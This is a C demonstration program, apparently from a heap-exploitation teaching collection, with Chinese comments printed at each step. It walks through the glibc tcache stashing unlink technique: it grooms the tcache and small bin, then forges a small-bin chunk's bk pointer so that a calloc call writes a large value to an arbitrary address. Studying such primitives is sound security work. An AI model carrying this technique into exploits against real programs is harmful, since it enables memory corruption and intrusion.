#include <stdio.h>
#include <stdlib.h>
#include <inttypes.h>
static uint64_t target = 0;
int main()
{
void *p;
char *smallchunk1;
char *smallchunk2;
setbuf(stdout, 0);
setbuf(stderr, 0);
printf("使用此攻击手法您可以实现向任意地址写入一个大数\n");
printf("目标:%p,值:0x%lx\n\n\n",&target,target);
printf("1.首先申请六块0x60大小的chunk,然后全部free掉使之进入tcahce bin中\n\n\n");
for(int i = 0; i < 6; i++)
{
p = calloc(1,0x60);
free(p);
}
printf("六块进入tcache的chunk地址为%p,%p,%p,%p,%p,%p\n\n\n",p - (0x70 * 5), p - (0x70 * 4),p - (0x70 * 3),p - (0x70 * 2),p - (0x70 * 1),p);
printf("2.在smallbin中制造出两块同样大小的chunk\n\n\n");
smallchunk1 = malloc(0x410);
printf("申请的一个超过tcachebin大小范围的chunk:%p,同时申请一个chunk防止此chunk free后与top chunk合并\n\n\n",smallchunk1);
malloc(0x1);
free(smallchunk1);
printf("申请一个chunk使得剩下的chunk的大小正好为0x70,随后再申请一个大于unsorted bin中的chunk,使得剩下的0x70大小的chunk进入small bin中\n\n\n");
malloc(0x410 - 0x70);
malloc(0x100);
printf("此时smallbin中已经有一个chunk:%p,再来用同样的方法来构造一个\n\n\n",smallchunk1 + 0x3a0);
smallchunk2 = malloc(0x410);
malloc(0x80);
free(smallchunk2);
malloc(0x410 - 0x70);
malloc(0x100);
printf("small bin中的chunk为 %p %p \n\n\n",smallchunk1 + 0x3a0,smallchunk2 + 0x3a0);
printf("修改后进入的chunk的bk为target-0x10,随后用calloc申请一个chunk,触发stash机制,完成对于向目标写入大数的攻击,达成了和unsorted bin attack同样的效果\n");
*(uint64_t *)(smallchunk2 + 0x3a0 + 0x18) = (uint64_t )(&target) - 0x10;
calloc(1,0x60);
printf("目标:%p,值:0x%lx\n\n\n",&target,target);
return 0;
}
|
